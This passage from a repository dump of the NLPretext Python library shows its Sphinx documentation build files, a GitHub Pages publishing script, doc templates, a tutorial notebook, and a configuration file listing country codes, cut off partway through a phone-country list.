    "content": "# Minimal makefile for Sphinx documentation\n#\n\n# You can set these variables from the command line, and also\n# from the environment for the first two.\nSPHINXOPTS           ?=\nSPHINXBUILD          ?= poetry run sphinx-build\nSPHINXAPIBUILD       ?= poetry run sphinx-apidoc\nSPHINXMULTIVERSION   ?= poetry run sphinx-multiversion\nSOURCEDIR            = source\nBUILDDIR             = build\n\n# Put it first so that \"make\" without argument is like \"make help\".\n.PHONY: help Makefile\nhelp:\n\t@$(SPHINXBUILD) -M help \"$(SOURCEDIR)\" \"$(BUILDDIR)\" $(SPHINXOPTS) $(O)\n\nmultiversion:\n\t@$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html\n\napidoc:\n\t@$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates\n\n# Catch-all target: route all unknown targets to Sphinx using the new\n# \"make mode\" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).\n%: Makefile\n\t@$(SPHINXBUILD) -M $@ \"$(SOURCEDIR)\" \"$(BUILDDIR)\" $(SPHINXOPTS) $(O)\n"
  },
  {
    "path": "docs/make.bat",
    "content": "@ECHO OFF\n\nREM Command file for Sphinx documentation\n\nif \"%SPHINXBUILD%\" == \"\" (\n\tset SPHINXBUILD=sphinx-build\n)\nset BUILDDIR=build\nset ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .\nif NOT \"%PAPER%\" == \"\" (\n\tset ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%\n)\n\nif \"%1\" == \"\" goto help\n\nif \"%1\" == \"help\" (\n\t:help\n\techo.Please use `make ^<target^>` where ^<target^> is one of\n\techo.  html       to make standalone HTML files\n\techo.  dirhtml    to make HTML files named index.html in directories\n\techo.  singlehtml to make a single large HTML file\n\techo.  pickle     to make pickle files\n\techo.  json       to make JSON files\n\techo.  htmlhelp   to make HTML files and a HTML help project\n\techo.  qthelp     to make HTML files and a qthelp project\n\techo.  devhelp    to make HTML files and a Devhelp project\n\techo.  epub       to make an epub\n\techo.  latex      to make LaTeX files, you can set PAPER=a4 or PAPER=letter\n\techo.  text       to make text files\n\techo.  man        to make manual pages\n\techo.  changes    to make an overview over all changed/added/deprecated items\n\techo.  linkcheck  to check all external links for integrity\n\techo.  doctest    to run all doctests embedded in the documentation if enabled\n\tgoto end\n)\n\nif \"%1\" == \"clean\" (\n\tfor /d %%i in (%BUILDDIR%\\*) do rmdir /q /s %%i\n\tdel /q /s %BUILDDIR%\\*\n\tgoto end\n)\n\nif \"%1\" == \"html\" (\n\t%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html\n\techo.\n\techo.Build finished. The HTML pages are in %BUILDDIR%/html.\n\tgoto end\n)\n\nif \"%1\" == \"dirhtml\" (\n\t%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml\n\techo.\n\techo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.\n\tgoto end\n)\n\nif \"%1\" == \"singlehtml\" (\n\t%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml\n\techo.\n\techo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.\n\tgoto end\n)\n\nif \"%1\" == \"pickle\" (\n\t%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle\n\techo.\n\techo.Build finished; now you can process the pickle files.\n\tgoto end\n)\n\nif \"%1\" == \"json\" (\n\t%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json\n\techo.\n\techo.Build finished; now you can process the JSON files.\n\tgoto end\n)\n\nif \"%1\" == \"htmlhelp\" (\n\t%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp\n\techo.\n\techo.Build finished; now you can run HTML Help Workshop with the ^\n.hhp project file in %BUILDDIR%/htmlhelp.\n\tgoto end\n)\n\nif \"%1\" == \"qthelp\" (\n\t%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp\n\techo.\n\techo.Build finished; now you can run \"qcollectiongenerator\" with the ^\n.qhcp project file in %BUILDDIR%/qthelp, like this:\n\techo.^> qcollectiongenerator %BUILDDIR%\\qthelp\\Mapnik.qhcp\n\techo.To view the help file:\n\techo.^> assistant -collectionFile %BUILDDIR%\\qthelp\\Mapnik.ghc\n\tgoto end\n)\n\nif \"%1\" == \"devhelp\" (\n\t%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp\n\techo.\n\techo.Build finished.\n\tgoto end\n)\n\nif \"%1\" == \"epub\" (\n\t%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub\n\techo.\n\techo.Build finished. The epub file is in %BUILDDIR%/epub.\n\tgoto end\n)\n\nif \"%1\" == \"latex\" (\n\t%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex\n\techo.\n\techo.Build finished; the LaTeX files are in %BUILDDIR%/latex.\n\tgoto end\n)\n\nif \"%1\" == \"text\" (\n\t%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text\n\techo.\n\techo.Build finished. The text files are in %BUILDDIR%/text.\n\tgoto end\n)\n\nif \"%1\" == \"man\" (\n\t%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man\n\techo.\n\techo.Build finished. The manual pages are in %BUILDDIR%/man.\n\tgoto end\n)\n\nif \"%1\" == \"changes\" (\n\t%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes\n\techo.\n\techo.The overview file is in %BUILDDIR%/changes.\n\tgoto end\n)\n\nif \"%1\" == \"linkcheck\" (\n\t%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck\n\techo.\n\techo.Link check complete; look for any errors in the above output ^\nor in %BUILDDIR%/linkcheck/output.txt.\n\tgoto end\n)\n\nif \"%1\" == \"doctest\" (\n\t%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest\n\techo.\n\techo.Testing of doctests in the sources finished, look at the ^\nresults in %BUILDDIR%/doctest/output.txt.\n\tgoto end\n)\n\n:end\n"
  },
  {
    "path": "docs/scripts/buildsite.sh",
    "content": "#!/bin/bash\n\nexport SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)\n\n##############\n# BUILD DOCS #\n##############\n\n# Python Sphinx, configured with source/conf.py\n# See https://www.sphinx-doc.org/\n\ncd docs/\n\ncurrent_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)\ncurrent_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)\n\nmake clean\nmake apidoc\ngit add .\ngit commit -m \"Commit needed for multiversioning\"\n\ngit pull --tags\ngit tag -a latest -m \"Latest version of the package\"\n\nmake multiversion\n\n#######################\n# Update GitHub Pages #\n#######################\n\ndocroot=`mktemp -d`\ncp -r build/html/* ${docroot}\n\ncd ..\n\ngit branch -d gh-pages\ngit checkout --orphan gh-pages\ngit rm --cached -r .\ngit clean -fdx\n\n# Adds .nojekyll file to the root to signal to GitHub that\n# directories that start with an underscore (_) can remain\ntouch .nojekyll\n\n# Add index.html\ncat > index.html <<EOF\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>Redirecting to the latest release</title>\n    <meta charset=\"utf-8\">\n    <meta http-equiv=\"refresh\" content=\"0; url=./latest/index.html\">\n    <link rel=\"canonical\" href=\"./latest/index.html\">\n  </head>\n</html>\nEOF\n\n# Add README\ncat > README.md <<EOF\n# README for the GitHub Pages Branch\nThis branch is simply a cache for the website and is not intended to be viewed on github.com.\nEOF\n\n# Copy the resulting html pages built from Sphinx to the gh-pages branch\ncp -r ${docroot}/* .\n\ngit add .\n\n# Make a commit with changes and any new files\nmsg=\"Updating Docs for commit ${GITHUB_SHA} made on `date -d\"@${SOURCE_DATE_EPOCH}\" --iso-8601=seconds` from ${GITHUB_REF} by ${GITHUB_ACTOR}\"\ngit commit -m \"${msg}\"\n\n# overwrite the contents of the gh-pages branch on our github.com repo\ngit push origin gh-pages --force\n\n# exit cleanly\nexit 0\n"
  },
  {
    "path": "docs/source/_templates/module.rst_t",
    "content": "\n{%- if show_headings %}\n{{- [basename] | join(' ') | e | heading }}\n\n{% endif -%}\n.. automodule:: {{ qualname }}\n{%- for option in automodule_options %}\n   :{{ option }}:\n{%- endfor %}\n"
  },
  {
    "path": "docs/source/_templates/package.rst_t",
    "content": "\n{%- macro automodule(modname, options) -%}\n.. automodule:: {{ modname }}\n{%- for option in options %}\n   :{{ option }}:\n{%- endfor %}\n{%- endmacro %}\n\n{%- macro toctree(docnames) -%}\n.. toctree::\n   :maxdepth: {{ maxdepth }}\n{% for docname in docnames %}\n   {{ docname }}\n{%- endfor %}\n{%- endmacro %}\n\n{%- if is_namespace %}\n{{- [\"**\", pkgname, \"**\"] | join(\"\") | heading }}\n{% else %}\n{% set pkg_list = pkgname.split('.') %}\n{{- [\"**\", pkg_list[-1], \"**\"] | join(\"\") | heading }}\n{% endif %}\n\n{%- if modulefirst and not is_namespace %}\n{{ automodule(pkgname, automodule_options) }}\n{% endif %}\n\n{%- if subpackages %}\n\n{{ toctree(subpackages) }}\n{% endif %}\n\n{%- if submodules %}\n{% if separatemodules %}\n{{ toctree(submodules) }}\n{% else %}\n{%- for submodule in submodules %}\n{% if show_headings %}\n{% set submodule_list = submodule.split('.') %}\n{{- [submodule_list[-1]] | join(\" \") | e | heading(2) }}\n{% endif %}\n{{ automodule(submodule, automodule_options) }}\n{% endfor %}\n{%- endif %}\n{%- endif %}\n\n{%- if not modulefirst and not is_namespace %}\n\n{{ automodule(pkgname, automodule_options) }}\n{% endif %}\n"
  },
  {
    "path": "docs/source/_templates/versions.html",
    "content": "\n{%- if current_version %}\n<div class=\"rst-versions\" data-toggle=\"rst-versions\" role=\"note\" aria-label=\"versions\">\n  <span class=\"rst-current-version\" data-toggle=\"rst-current-version\">\n    <span class=\"fa fa-book\"> Other Versions</span>\n    v: {{ current_version.name }}\n    <span class=\"fa fa-caret-down\"></span>\n  </span>\n  <div class=\"rst-other-versions\">\n    {%- if versions.tags %}\n    <dl>\n      <dt>Tags</dt>\n      {%- for item in versions.tags %}\n      <dd><a href=\"{{ item.url }}\">{{ item.name }}</a></dd>\n      {%- endfor %}\n    </dl>\n    {%- endif %}\n    {%- if versions.branches %}\n    <dl>\n      <dt>Branches</dt>\n      {%- for item in versions.branches %}\n      <dd><a href=\"{{ item.url }}\">{{ item.name }}</a></dd>\n      {%- endfor %}\n    </dl>\n    {%- endif %}\n  </div>\n</div>\n{%- endif %}\n"
  },
  {
    "path": "docs/source/conf.py",
    "content": "# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(\"..\"))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = \"nlpretext\"\nauthor = \"artefactory\"\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n    \"sphinx.ext.autodoc\",\n    \"sphinx.ext.autosummary\",\n    \"sphinx.ext.intersphinx\",\n    \"sphinx.ext.mathjax\",\n    \"sphinx.ext.napoleon\",\n    \"sphinx.ext.todo\",\n    \"sphinx.ext.viewcode\",\n    \"recommonmark\",\n    \"nbsphinx\",\n    \"sphinx_multiversion\",\n    \"sphinx_autodoc_typehints\",\n    \"sphinx_rtd_theme\",\n]\n\nsource_suffix = {\n    \".rst\": \"restructuredtext\",\n    \".txt\": \"restructuredtext\",\n    \".md\": \"markdown\",\n}\n\nsource_parsers = {\".md\": \"recommonmark.parser.CommonMarkParser\"}\n\nnbsphinx_execute = \"never\"\n\ngithub_url = \"https://github.com/artefactory/NLPretext\"\n\nsmv_prefer_remote_refs = False\nsmv_remote_whitelist = None\nsmv_prebuild_command = (\n    \"poetry run sphinx-apidoc -f -o source/apidoc/ \"\n    \"../nlpretext/ \"\n    \"--implicit-namespaces -M -t source/_templates\"\n)\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# Autodoc parameters\nalways_document_param_types = True\nadd_module_names = False\nautodoc_member_order = \"bysource\"\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages.  See the documentation for\n# a list of builtin themes.\n\nhtml_theme = \"sphinx_rtd_theme\"\n\ngithub_url = \"https://www.github.com/artefactory/NLPretext}\"\n\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# -- Options for LaTeX output ------------------------------------------------\n\nlatex_elements = {\n    # Font packages\n    \"fontpkg\": \"\\\\usepackage{amsmath, amsfonts, amssymb, amsthm}\"\n}\n"
  },
  {
    "path": "docs/source/index.rst",
    "content": "=========\nNLPretext\n=========\n\n\nWelcome to NLPretext's documentation!\n========================================\n\nThe NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing.\n\n\n# Installation\n\nBeware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019.\n\nTo install this library you should first clone the repository:\n\npip install nlpretext\n\n\n.. toctree::\n    :maxdepth: 4\n    :caption: Tutorials:\n\n    ./tutorials/index\n\n.. toctree::\n    :maxdepth: 2\n    :caption: API Reference:\n\n    ./apidoc/modules\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n"
  },
  {
    "path": "docs/source/tutorials/basic_notebook.ipynb",
    "content": "{\n \"cells\": [\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"# How to use the package in a notebook\\n\",\n    \"\\n\",\n    \"<div align=\\\"center\\\">\\n\",\n    \"\\n\",\n    \"<div style=\\\"width: 25%; min-width: 150px; padding: 20px\\\">\\n\",\n    \"\\n\",\n    \"![Python Logo](../_static/images/python_logo.png)\\n\",\n    \"\\n\",\n    \"</div>\\n\",\n    \"\\n\",\n    \"### *nlpretext*\\n\",\n    \"\\n\",\n    \"</div>\\n\",\n    \"\\n\",\n    \"## Installing from the main branch\\n\",\n    \"\\n\",\n    \"To install the library from the main branch, you can run the following cell :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main\"\n   ]\n  },\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"## Installing from a specific release\\n\",\n    \"\\n\",\n    \"To install the library from a specific release, you can run the following cell :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5\"\n   ]\n  },\n  {\n   \"cell_type\": \"markdown\",\n   \"metadata\": {},\n   \"source\": [\n    \"## Using the package\\n\",\n    \"\\n\",\n    \"You can now import and run whatever is in the package :\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"from nlpretext.basic.preprocess import replace_emails\\n\",\n    \"\\n\",\n    \"example = \\\"I have forwarded this email to obama@whitehouse.gov\\\"\\n\",\n    \"example = replace_emails(example, replace_with=\\\"*EMAIL*\\\")\"\n   ]\n  },\n  {\n   \"cell_type\": \"code\",\n   \"execution_count\": null,\n   \"metadata\": {\n    \"pycharm\": {\n     \"name\": \"#%%\\n\"\n    }\n   },\n   \"outputs\": [],\n   \"source\": [\n    \"print(example)\"\n   ]\n  }\n ],\n \"metadata\": {\n  \"kernelspec\": {\n   \"display_name\": \"Python 3\",\n   \"language\": \"python\",\n   \"name\": \"python3\"\n  },\n  \"language_info\": {\n   \"codemirror_mode\": {\n    \"name\": \"ipython\",\n    \"version\": 3\n   },\n   \"file_extension\": \".py\",\n   \"mimetype\": \"text/x-python\",\n   \"name\": \"python\",\n   \"nbconvert_exporter\": \"python\",\n   \"pygments_lexer\": \"ipython3\",\n   \"version\": \"3.7.9\"\n  }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 1\n}\n"
  },
  {
    "path": "docs/source/tutorials/index.rst",
    "content": "Tutorials\n=========\n\n\n.. toctree::\n    :maxdepth: 4\n    :glob:\n\n    basic_notebook\n"
  },
  {
    "path": "nlpretext/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n\n# mypy: disable-error-code=\"attr-defined\"\n# mypy: disable-error-code=\"assignment\"\n\n\"\"\"All the goto functions you need to handle NLP use-cases, integrated in NLPretext.\"\"\"\n\nfrom importlib.metadata import PackageNotFoundError, version\n\nfrom nlpretext.preprocessor import Preprocessor\n\ntry:\n    __version__ = version(__name__)\nexcept PackageNotFoundError:  # pragma: no cover\n    __version__ = \"unknown\"\n\n\n__all__ = [\"Preprocessor\"]\n"
  },
  {
    "path": "nlpretext/_config/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/_config/config.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/usr/local/bin/python3\nfrom typing import List, Optional\n\nimport os\n\nimport phonenumbers as _phonenumbers\n\nROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\n\n# Country config\nCOUNTRY_MAPPING_ISO = {\n    \"af\": \"Afghanistan\",\n    \"ax\": \"Åland Islands\",\n    \"al\": \"Albania\",\n    \"dz\": \"Algeria\",\n    \"as\": \"American Samoa\",\n    \"ad\": \"Andorra\",\n    \"ao\": \"Angola\",\n    \"ai\": \"Anguilla\",\n    \"aq\": \"Antarctica\",\n    \"ag\": \"Antigua and Barbuda\",\n    \"ar\": \"Argentina\",\n    \"am\": \"Armenia\",\n    \"aw\": \"Aruba\",\n    \"au\": \"Australia\",\n    \"at\": \"Austria\",\n    \"az\": \"Azerbaijan\",\n    \"bs\": \"Bahamas\",\n    \"bh\": \"Bahrain\",\n    \"bd\": \"Bangladesh\",\n    \"bb\": \"Barbados\",\n    \"by\": \"Belarus\",\n    \"be\": \"Belgium\",\n    \"bz\": \"Belize\",\n    \"bj\": \"Benin\",\n    \"bm\": \"Bermuda\",\n    \"bt\": \"Bhutan\",\n    \"bo\": \"Bolivia (Plurinational State of)\",\n    \"bq\": \"Bonaire, Sint Eustatius and Saba\",\n    \"ba\": \"Bosnia and Herzegovina\",\n    \"bw\": \"Botswana\",\n    \"bv\": \"Bouvet Island\",\n    \"br\": \"Brazil\",\n    \"io\": \"British Indian Ocean Territory\",\n    \"bn\": \"Brunei Darussalam\",\n    \"bg\": \"Bulgaria\",\n    \"bf\": \"Burkina Faso\",\n    \"bi\": \"Burundi\",\n    \"cv\": \"Cabo Verde\",\n    \"kh\": \"Cambodia\",\n    \"cm\": \"Cameroon\",\n    \"ca\": \"Canada\",\n    \"ky\": \"Cayman Islands\",\n    \"cf\": \"Central African Republic\",\n    \"td\": \"Chad\",\n    \"cl\": \"Chile\",\n    \"cn\": \"China\",\n    \"cx\": \"Christmas Island\",\n    \"cc\": \"Cocos (Keeling) Islands\",\n    \"co\": \"Colombia\",\n    \"km\": \"Comoros\",\n    \"cg\": \"Congo\",\n    \"cd\": \"Congo, Democratic Republic of the\",\n    \"ck\": \"Cook Islands\",\n    \"cr\": \"Costa Rica\",\n    \"ci\": \"Côte d'Ivoire\",\n    \"hr\": \"Croatia\",\n    \"cu\": \"Cuba\",\n    \"cw\": \"Curaçao\",\n    \"cy\": \"Cyprus\",\n    \"cz\": \"Czechia\",\n    \"dk\": \"Denmark\",\n    \"dj\": \"Djibouti\",\n    \"dm\": \"Dominica\",\n    \"do\": \"Dominican Republic\",\n    \"ec\": \"Ecuador\",\n    \"eg\": \"Egypt\",\n    \"sv\": \"El Salvador\",\n    \"gq\": \"Equatorial Guinea\",\n    \"er\": \"Eritrea\",\n    \"ee\": \"Estonia\",\n    \"sz\": \"Eswatini\",\n    \"et\": \"Ethiopia\",\n    \"fk\": \"Falkland Islands (Malvinas)\",\n    \"fo\": \"Faroe Islands\",\n    \"fj\": \"Fiji\",\n    \"fi\": \"Finland\",\n    \"fr\": \"France\",\n    \"gf\": \"French Guiana\",\n    \"pf\": \"French Polynesia\",\n    \"tf\": \"French Southern Territories\",\n    \"ga\": \"Gabon\",\n    \"gm\": \"Gambia\",\n    \"ge\": \"Georgia\",\n    \"de\": \"Germany\",\n    \"gh\": \"Ghana\",\n    \"gi\": \"Gibraltar\",\n    \"gr\": \"Greece\",\n    \"gl\": \"Greenland\",\n    \"gd\": \"Grenada\",\n    \"gp\": \"Guadeloupe\",\n    \"gu\": \"Guam\",\n    \"gt\": \"Guatemala\",\n    \"gg\": \"Guernsey\",\n    \"gn\": \"Guinea\",\n    \"gw\": \"Guinea-Bissau\",\n    \"gy\": \"Guyana\",\n    \"ht\": \"Haiti\",\n    \"hm\": \"Heard Island and McDonald Islands\",\n    \"va\": \"Holy See\",\n    \"hn\": \"Honduras\",\n    \"hk\": \"Hong Kong\",\n    \"hu\": \"Hungary\",\n    \"is\": \"Iceland\",\n    \"in\": \"India\",\n    \"id\": \"Indonesia\",\n    \"ir\": \"Iran (Islamic Republic of)\",\n    \"iq\": \"Iraq\",\n    \"ie\": \"Ireland\",\n    \"im\": \"Isle of Man\",\n    \"il\": \"Israel\",\n    \"it\": \"Italy\",\n    \"jm\": \"Jamaica\",\n    \"jp\": \"Japan\",\n    \"je\": \"Jersey\",\n    \"jo\": \"Jordan\",\n    \"kz\": \"Kazakhstan\",\n    \"ke\": \"Kenya\",\n    \"ki\": \"Kiribati\",\n    \"kp\": \"Korea (Democratic People's Republic of)\",\n    \"kr\": \"Korea, Republic of\",\n    \"kw\": \"Kuwait\",\n    \"kg\": \"Kyrgyzstan\",\n    \"la\": \"Lao People's Democratic Republic\",\n    \"lv\": \"Latvia\",\n    \"lb\": \"Lebanon\",\n    \"ls\": \"Lesotho\",\n    \"lr\": \"Liberia\",\n    \"ly\": \"Libya\",\n    \"li\": \"Liechtenstein\",\n    \"lt\": \"Lithuania\",\n    \"lu\": \"Luxembourg\",\n    \"mo\": \"Macao\",\n    \"mg\": \"Madagascar\",\n    \"mw\": \"Malawi\",\n    \"my\": \"Malaysia\",\n    \"mv\": \"Maldives\",\n    \"ml\": \"Mali\",\n    \"mt\": \"Malta\",\n    \"mh\": \"Marshall Islands\",\n    \"mq\": \"Martinique\",\n    \"mr\": \"Mauritania\",\n    \"mu\": \"Mauritius\",\n    \"yt\": \"Mayotte\",\n    \"mx\": \"Mexico\",\n    \"fm\": \"Micronesia (Federated States of)\",\n    \"md\": \"Moldova, Republic of\",\n    \"mc\": \"Monaco\",\n    \"mn\": \"Mongolia\",\n    \"me\": \"Montenegro\",\n    \"ms\": \"Montserrat\",\n    \"ma\": \"Morocco\",\n    \"mz\": \"Mozambique\",\n    \"mm\": \"Myanmar\",\n    \"na\": \"Namibia\",\n    \"nr\": \"Nauru\",\n    \"np\": \"Nepal\",\n    \"nl\": \"Netherlands\",\n    \"nc\": \"New Caledonia\",\n    \"nz\": \"New Zealand\",\n    \"ni\": \"Nicaragua\",\n    \"ne\": \"Niger\",\n    \"ng\": \"Nigeria\",\n    \"nu\": \"Niue\",\n    \"nf\": \"Norfolk Island\",\n    \"mk\": \"North Macedonia\",\n    \"mp\": \"Northern Mariana Islands\",\n    \"no\": \"Norway\",\n    \"om\": \"Oman\",\n    \"pk\": \"Pakistan\",\n    \"pw\": \"Palau\",\n    \"ps\": \"Palestine, State of\",\n    \"pa\": \"Panama\",\n    \"pg\": \"Papua New Guinea\",\n    \"py\": \"Paraguay\",\n    \"pe\": \"Peru\",\n    \"ph\": \"Philippines\",\n    \"pn\": \"Pitcairn\",\n    \"pl\": \"Poland\",\n    \"pt\": \"Portugal\",\n    \"pr\": \"Puerto Rico\",\n    \"qa\": \"Qatar\",\n    \"re\": \"Réunion\",\n    \"ro\": \"Romania\",\n    \"ru\": \"Russian Federation\",\n    \"rw\": \"Rwanda\",\n    \"bl\": \"Saint Barthélemy\",\n    \"sh\": \"Saint Helena, Ascension and Tristan da Cunha\",\n    \"kn\": \"Saint Kitts and Nevis\",\n    \"lc\": \"Saint Lucia\",\n    \"mf\": \"Saint Martin (French part)\",\n    \"pm\": \"Saint Pierre and Miquelon\",\n    \"vc\": \"Saint Vincent and the Grenadines\",\n    \"ws\": \"Samoa\",\n    \"sm\": \"San Marino\",\n    \"st\": \"Sao Tome and Principe\",\n    \"sa\": \"Saudi Arabia\",\n    \"sn\": \"Senegal\",\n    \"rs\": \"Serbia\",\n    \"sc\": \"Seychelles\",\n    \"sl\": \"Sierra Leone\",\n    \"sg\": \"Singapore\",\n    \"sx\": \"Sint Maarten (Dutch part)\",\n    \"sk\": \"Slovakia\",\n    \"si\": \"Slovenia\",\n    \"sb\": \"Solomon Islands\",\n    \"so\": \"Somalia\",\n    \"za\": \"South Africa\",\n    \"gs\": \"South Georgia and the South Sandwich Islands\",\n    \"ss\": \"South Sudan\",\n    \"es\": \"Spain\",\n    \"lk\": \"Sri Lanka\",\n    \"sd\": \"Sudan\",\n    \"sr\": \"Suriname\",\n    \"sj\": \"Svalbard and Jan Mayen\",\n    \"se\": \"Sweden\",\n    \"ch\": \"Switzerland\",\n    \"sy\": \"Syrian Arab Republic\",\n    \"tw\": \"Taiwan, Province of China\",\n    \"tj\": \"Tajikistan\",\n    \"tz\": \"Tanzania, United Republic of\",\n    \"th\": \"Thailand\",\n    \"tl\": \"Timor-Leste\",\n    \"tg\": \"Togo\",\n    \"tk\": \"Tokelau\",\n    \"to\": \"Tonga\",\n    \"tt\": \"Trinidad and Tobago\",\n    \"tn\": \"Tunisia\",\n    \"tr\": \"Turkey\",\n    \"tm\": \"Turkmenistan\",\n    \"tc\": \"Turks and Caicos Islands\",\n    \"tv\": \"Tuvalu\",\n    \"ug\": \"Uganda\",\n    \"ua\": \"Ukraine\",\n    \"ae\": \"United Arab Emirates\",\n    \"gb\": \"United Kingdom of Great Britain and Northern Ireland\",\n    \"us\": \"United States of America\",\n    \"um\": \"United States Minor Outlying Islands\",\n    \"uy\": \"Uruguay\",\n    \"uz\": \"Uzbekistan\",\n    \"vu\": \"Vanuatu\",\n    \"ve\": \"Venezuela (Bolivarian Republic of)\",\n    \"vn\": \"Viet Nam\",\n    \"vg\": \"Virgin Islands (British)\",\n    \"vi\": \"Virgin Islands (U.S.)\",\n    \"wf\": \"Wallis and Futuna\",\n    \"eh\": \"Western Sahara\",\n    \"ye\": \"Yemen\",\n    \"zm\": \"Zambia\",\n    \"zw\": \"Zimbabwe\",\n}\n\n# Phone numbers config\nSUPPORTED_COUNTRY: List[Optional[str]] = [\n    None,\n    \"US\",\n    \"AG\",\n    \"AI\",\n    \"AS\",\n    \"BB\",\n    \"BM\",\n    \"BS\",\n    \"CA\",\n    \"DM\",\n    \"GD\",\n    \"GU\",\n    \"JM\",\n    